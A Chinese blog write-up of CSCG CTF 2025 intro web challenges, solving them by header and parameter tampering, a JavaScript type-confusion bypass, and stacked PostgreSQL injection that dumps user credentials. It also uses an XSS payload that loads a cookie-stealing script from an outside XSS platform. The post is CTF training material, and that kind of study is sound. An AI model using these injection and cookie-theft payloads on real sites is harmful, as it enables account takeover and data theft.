CSCG CTF 2025 writeup

已于 2025-03-14 22:49:01 修改
阅读量1.1k 收藏 10
点赞数 12
分类专栏: CTF 文章标签: 网络安全 安全
于 2025-03-14 22:43:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CleverLee0/article/details/146080892
版权

CSCG CTF 2025 writeups【持续更新】

赛事信息

web

Intro Web 1

flag 第一段在html注释里CSCG{ImgAvH8w5
在这里插入图片描述
flag第二段在js中1a7364a71
在这里插入图片描述
flag第三段在响应头中VdGb98br}
在这里插入图片描述
flag: CSCG{ImgAvH8w51a7364a71VdGb98br}

Intro Web 2

根据提示修改useragent为windows 95,然后得到flag一部分:CSCG{l9jj550K
在这里插入图片描述
提示用post请求,但没给post的参数,推测post参数为filename,提示请求flag.txt,然后出一部分flag:UaT0BVvk
在这里插入图片描述
用GET传递参数,拿到flag一部分:Q9Z39J9A
在这里插入图片描述
在第一次点击最后一个认证的时候,服务器会重定向到一个burn-after-reading-6237725.php?authorized=false。页面,这时候我们要更改为true才可以。最后一段flag:W4at6R2B}
在这里插入图片描述
flag:CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}

Intro Web 3

这个题第一关,刚开始理解错了,以为要爆破哈希,发现最后爆不出来,才考虑到其他方法,所以记录一下错误示例。
通过爆破,拿到sha256哈希1次的值,然后爆破,flag格式是CSCG{xxx},所以用工具爆破
在这里插入图片描述
sha256(flag) =47a916af6fdd6c7c0d6e2a9cfb33a0b1755a207e3d76b738300a2b85c4b5261c

使用 hashcat 掩码爆破的方法

hashcat -m 1400 -a 3 -1 ?d?l?u_ 47a916af6fdd6c7c0d6e2a9cfb33a0b1755a207e3d76b738300a2b85c4b5261c CSCG{?1?1?1?1?1?1?1?1 --increment --force

-1是自定义掩码(?d是数字类型,?l是小写字母,?u是大写字母,再补充个下划线)
-m 1400 是sha256模式
-a 3 是掩码模式
爆破半小时还出不来,因为只知道前几位,但不知道总长度

下边是参考解答:

  • 漏洞点:类型验证绕过
    • 代码仅检查 chosenNumber 是否为 string 类型,但未处理其他非数字类型(如数组)。
  • ​验证逻辑缺陷:
    • 若 chosenNumber 是空数组 [],Math.min([], randomNumber) 会强制类型转换为 0,导致 iterations = 0。
  • ​类型转换漏洞:
    • 空数组 [] 转换为数字时为 0。
      在这里插入图片描述
      flag第一部分 CSCG{Q8oIoy3P
      第二部分
      我在尝试sql注入的时候,使用了or 1=1 -- 的经典payload,而服务器返回了iwasfirstlol,而不是我的用户名,这让我确信存在sql注入
      在这里插入图片描述
      当我使用堆叠注入的时候,我获得了如下的信息username=admin&password=smart123'; select version();--
      在这里插入图片描述
  1. 查模式名
    在postgresql中也存在information_schema表
select current_schema()
select schemaname from pg_tables
select schema_name from information_schema.schemata

在这里插入图片描述
2. 查表名

select tablename from pg_tables where schemaname='public'
select table_name from information_schema.tables where table_schema='public'

在这里插入图片描述
3. 查字段名

select column_name,data_type from information_schema.columns where table_name='users'
select attname,typname from pg_attribute b JOIN pg_class A ON A.oid = b.attrelid  JOIN pg_type C ON C.oid = b.atttypid JOIN pg_namespace d ON A.relnamespace = d.oid WHERE  b.attnum > 0 AND A.relname = 'users';--

# 上述第二个命令展开如下
SELECT
	attname,typname 
FROM
	pg_attribute b
	JOIN pg_class A ON A.oid = b.attrelid
	JOIN pg_type C ON C.oid = b.atttypid
	JOIN pg_namespace d ON A.relnamespace = d.oid 
WHERE
	b.attnum > 0 AND A.relname = 'users'

在这里插入图片描述
在这里插入图片描述
4. 查数据
在postgresql中没有group_concat函数,如果需要将大量数据一起查出来的话可以用string_agg和array_agg两个函数:

select string_agg(id||','||username||','||password, ',') from users
select array_to_string(array_agg(id||','||username||','||password), ',') from users

在这里插入图片描述
在这里插入图片描述
如上图所示,我们拿到了所有用户的用户名和密码,其中有admin的账号和密码,admin,superadminpasswordunguessable123,然后拿着这个账号密码登录即可获得flag的第二部分
在这里插入图片描述
flag part2:s956Uwvv
第三部分
当我在留言板输入,script>alert(3)</script>的时候,目标有弹窗,说明存在xss注入问题
在这里插入图片描述
然后我找了一个在线网站,xss平台可以接收cookie的,并嵌入了恶意代码,<sCRiPt sRC=//xs.pe/Vro></sCrIpT>
在这里我们看到了,第三段flag,WIfJAzNs}
在这里插入图片描述
flag: CSCG{Q8oIoy3Ps956UwvvWIfJAzNs}

UoftCTF2025 writeup(部分
c582037的博客
01-13 410
UoftCTF2025部分wp
UTCTF 2025 writeup
blackpeach的博客
03-17 1117
UTCTF 2025 writeup【部分】 做出来的:web脑洞、misc是linux简单提权、取证是01转二维码、直接搜索二进制、文件权限描述符转01然后转字符串 没做出来的:osint巨难,what3words是个在线网站;misc3是discord里藏东西、web有俩没做出来
ApoorvCTF 2025 writeup【部分】
blackpeach的博客
03-03 1400
ApoorvCTF 2025 writeup
cscg:代码生成是代码汇总的双重任务
05-23
代码生成是代码汇总的双重任务 提出的CS / CG模型的临时实施 入门 必须将每个数据集定义为torch.utils.data.Dataset的子类,并具有用于 预处理和vocab构建器(文本-> vocab查找索引) __getitem__必须返回一个培训...
微信小游戏 cscg (源码).zip
01-25
本资源提供的"微信小游戏 cscg (源码).zip"包含了微信小游戏的完整源代码,是学习和研究微信小游戏开发的宝贵材料。下面将详细探讨微信小游戏的开发技术、核心特点以及源码分析。 1. **微信小游戏开发技术** - *...
小游戏源码 cscg (微信公众号小游戏).rar
01-25
微信公众号小游戏源码
maze-server:CSCG游戏“迷宫”的实验服务器
05-31
LiveOverflow 游戏“迷宫”的实验服务器,它是作为 CSCG 2020 的一部分开发的。如果一切按计划进行,这个存储库中的代码将很快在 DigitalOcean 服务器上运行,供有兴趣的每个人试用。 更新 不幸的是,不再有公共...
长沙市长郡滨江中学学校提质改造工程项目CSCG-201701030010.doc.doc
02-10
长沙市长郡滨江中学学校提质改造工程项目CSCG-201701030010.doc.doc
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
LlamaFirewall:开源框架助力检测与缓解AI核心安全风险
最新发布
FreeBuf_的博客
05-26 645
LlamaFirewall 是一款面向大语言模型(LLM)应用的系统级安全框架,采用模块化设计支持分层自适应防御。该框架旨在缓解各类AI代理安全风险,包括越狱攻击(jailbreaking)、间接提示注入(indirect prompt injection)、目标劫持(goal hijacking)以及不安全代码输出等问题。
“智”造巨轮启新程:数字安全的战略布局
Scgute88的博客
05-23 571
在数字化转型的浪潮中,某大型智能家电企业通过与天空卫士的合作,构建了一套全面的数据安全防护体系。该体系包括统一内容管理平台、邮件防泄露系统、网络防泄露系统和应用防泄露系统,确保数据在传输、存储和处理的每个环节都得到有效保护。这一智能化的安全解决方案不仅提升了企业的数据安全水平,还增强了员工的安全意识,为业务创新提供了坚实保障。企业的成功实践表明,数据安全是数字化转型的重要助推器,持续的安全投入和创新是企业在数字化时代稳健前行的关键。
智慧化工园区安全风险管控平台建设方案(Word)
xx_123321456的博客
05-23 841
本项目旨在为XX化工园区打造一个集安全监管、封闭化管理、应急管理于一体的智慧化平台。项目背景基于政策需求、安全生产监管需求及工业互联网+安全生产的智慧应用需求,通过技术、经济和社会效益的可行性分析,确定了建设目标和内容。总体方案设计遵循统筹发展、标准规范、经济实用等原则,采用微服务架构、边缘计算、机器视觉等关键技术,构建了包括安全监管体系、封闭化管理体系、应急管理体系在内的综合平台。项目推进计划详细规划了项目组织保障、管理措施和质量保障,同时制定了全面的培训方案和验收方案,确保项目顺利实施和高效运行。售后服
2025年渗透测试面试题总结-匿名[社招]安全工程师(红队方向)2(题目+回答)
soc的博客
05-23 1093
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
云原生安全之网络IP协议:从基础到实践指南
like21a的博客
05-25 883
🔥「炎码工坊」技术弹药已装填!点击关注 → 解锁工业级干货【工具实测|项目避坑|源码燃烧指南】
港口危货储存单位主要安全管理人员考试题
2301_79298466的博客
05-23 429
1、根据《危险化学品安全管理条例》,港口危货储存单位应当建立( )档案,如实记录储存的危险化学品名称、数量、流向等信息。:根据《国际海运危险货物规则》(IMDG Code),危险货物分为 9 大类(如爆炸品、气体、易燃液体等)。:《危险化学品重大危险源辨识》(GB 18218)以物质危险特性和数量为辨识依据。:《危险化学品安全管理条例》第二十五条明确要求储存单位建立危险化学品管理档案。:过硫酸铵具有强氧化性,属于第五类危险货物(氧化性物质和有机过氧化物)。2、港口危险货物按其危险性分为( )大类。
城市地下“隐形卫士”:激光甲烷传感器如何保障燃气安全
ShengSe_Sensor的博客
05-23 474
城市地下管网作为城市运行的“生命线”,承担着燃气、供水、电力、通信等重要功能,但其安全面临严峻挑战。管线老化、违规施工和监管困难等问题导致燃气泄漏事故频发,甚至引发爆炸,造成人员伤亡和财产损失。传统的人工巡检方式效率低、漏检率高,难以应对隐蔽性强、破坏力大的燃气泄漏问题。为解决这一难题,行业推出了基于物联网和激光传感技术的智能监测方案,通过实时监测甲烷浓度、井盖异动和液位等数据,实现全天候监控和智能预警,有效防范燃气泄漏事故,保障城市安全运行。
macOS专业用户远程操作全场景优化指南:开发运维协同、安全合规与性能提升实战
m0_64361522的博客
05-22 1097
在数字化办公体系中,macOS系统的远程接入已成为支撑跨地域协作的关键环节。通过合理选择连接方案、完善防护体系、提升运行效率,并结合不同专业领域的使用场景,能够构建兼顾安全性与效能的远程工作架构。内网穿透类软件(如cpolar)的引入,为私有网络环境下的安全访问提供了创新性解决方案。值得注意的是,网络安全防护需要持续迭代优化,建议各专业领域用户根据业务特征动态调整技术策略。
栈迁移与onegadget利用[GHCTF 2025]ret2libc2
Welcome To Myon'Blog !
05-25 784
​虽然 format 被初始化为 "hello world!"但是它就在 buf 下面,后面的 read 我们可以读入 0x60因此我们就可以覆盖 format,利用 printf 来泄露 libc 里的真实地址这里 rax 存的就是 buf,我们溢出后劫持程序到 0x401227,即指令:mov rdi, rax 后面再次执行 printf 函数,打印出真实地址,我们就可以计算 libc 基址了然后程序会继续执行 read 函数,我们又可以溢出,劫持到 system 从而 get
ctf2025渗透赛
02-10
### CTF2025 渗透测试比赛详情 CTF(Capture The Flag)是一种流行的信息安全竞赛形式,旨在通过模拟真实世界中的攻击场景来提升参赛者的技能。对于希望参与CTF2025渗透测试比赛的人士来说,了解如何准备和加入这类活动至关重要。 #### 比赛信息查找 为了获取最新的CTF2025赛事安排和其他相关信息,建议访问专门的CTF平台网站,如XCTF社区[^1]。这些平台上会发布各类国内外的比赛列表及其具体的时间表。此外,也可以关注其他知名的CTF资源站点,例如ctfhub,这里同样提供了丰富的当前及即将举办的赛事资讯[^3]。 #### 报名流程 当确定要参加某项特定的CTF2025渗透测试比赛之后,需按照官方指南完成注册过程。这通常涉及填写必要的个人信息并提交给主办方审核。一旦收到确认邮件,则表示成功加入了该次竞赛行列。需要注意的是,不同类型的CTF有不同的规则设定: - **解题模式**:参与者可通过线上或线下网络参与到此类活动中去解答一系列信息安全难题。此模式下,成绩取决于解决问题的速度与准确性。 - **攻防对抗模式**:这是一种更为激烈的竞争形式,各队不仅要保护自己的服务器免受攻击,还要尝试入侵对手的服务以获得分数。 #### 准备工作 在正式踏入赛场之前,充分准备好是必不可少的一环。可以从以下几个方面着手: - 学习基础理论和技术知识点; - 实践操作练习,尤其是针对Web应用的安全评估技巧; - 阅读过往比赛后的Write-up文档,借鉴高手们的思维方式和解决方案策略。 #### 注意事项 在整个过程中务必严格遵守比赛规定,保持良好的竞技精神。严禁违反公平原则的行为,比如私自与其他队伍沟通协作或是故意干扰比赛环境稳定性的举动都将受到严厉处罚[^5]。 ```python # 示例Python脚本用于自动化收集公开可用的情报数据作为前期准备工作的一部分 import requests def gather_osint(target_domain): url = f"https://api.example.com/v1/domains/{target_domain}/information" response = requests.get(url) if response.status_code == 200: data = response.json() print(f"Gathered information about {target_domain}:") for key, value in data.items(): print(f"{key}: {value}") else: print("Failed to retrieve information.") if __name__ == "__main__": target = "example-target-domain.com" gather_osint(target) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值